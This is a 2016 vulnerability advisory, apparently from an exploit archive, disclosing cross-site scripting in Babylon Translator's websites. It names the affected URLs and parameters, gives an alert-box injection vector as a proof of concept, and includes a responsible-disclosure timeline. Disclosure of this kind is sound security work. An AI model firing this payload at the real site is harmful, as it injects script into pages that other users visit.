Babylon Translator Cross Site Scripting

Babylon Translator Cross Site Scripting: Posted Jun 2, 2016; Authored by Francisco Javier Santiago Vazquez; Babylon Translator suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 437506dc14a1742e3d449c69b8d154fb0b8582bb4cb44e1d81df1db63e91d579; Download | Favorite | View

Babylon Translator Cross Site Scripting

I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting (XSS)



II. PROOF OF CONCEPT
-------------------------

*URL: *

   1. http://espanol.babylon-software.com/bht/index.html?trid=
   2. http://traductor.babylon-software.com/ingles/a-espanol/
   3. http://traduccion.babylon-software.com/?trid=

*Vector:* <img src=1 onerror=alert("n0ipr0cs");>/

*State:* unpathed



III. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Translator and web Babylon.



IV. ABOUT BABYLON

-------------------------

Babylon was founded in 1997 and is headquartered in Tel Aviv (Israel).
Babylon offers different and various services to end users and
businesses.

The translator offers translations in 77 languages, English is also
available. The software is sold worldwide and is used in more than 168
countries and has a growing base of users of desktop installations
more than 90 million. In addition it has app for Iphone, Android,
Windows, Blackberry and Kindle and even a pro for business service.

On the other hand, there is monetization services for providers of
contents and web publishers web sites, bloggers and webmasters.

This company even has search services on the web, yes also is a search engine.




V. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez  aka "n0ipr0cs"
(https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).



VI. DISCLOSURE TIMELINE
-------------------------
April 03, 2016: Vulnerability acquired by Francisco Javier Santiago
Vázquez. aka "n0ipr0cs".
April  03, 2016 Responsible disclosure to Babylon Security Team.
April  04, 2016 Responsible disclosure to Babylon Security Team.
May  18, 2016 Responsible disclosure to Babylon Security Team.

June 02, 2016 Disclosure.



VII. Links
------------------------
POC: http://www.estacion-informatica.com/2016/06/xss-en-babylon.html







*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Babylon Translator Cross Site Scripting

Babylon Translator Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Babylon Translator Cross Site Scripting

Share This

Babylon Translator Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems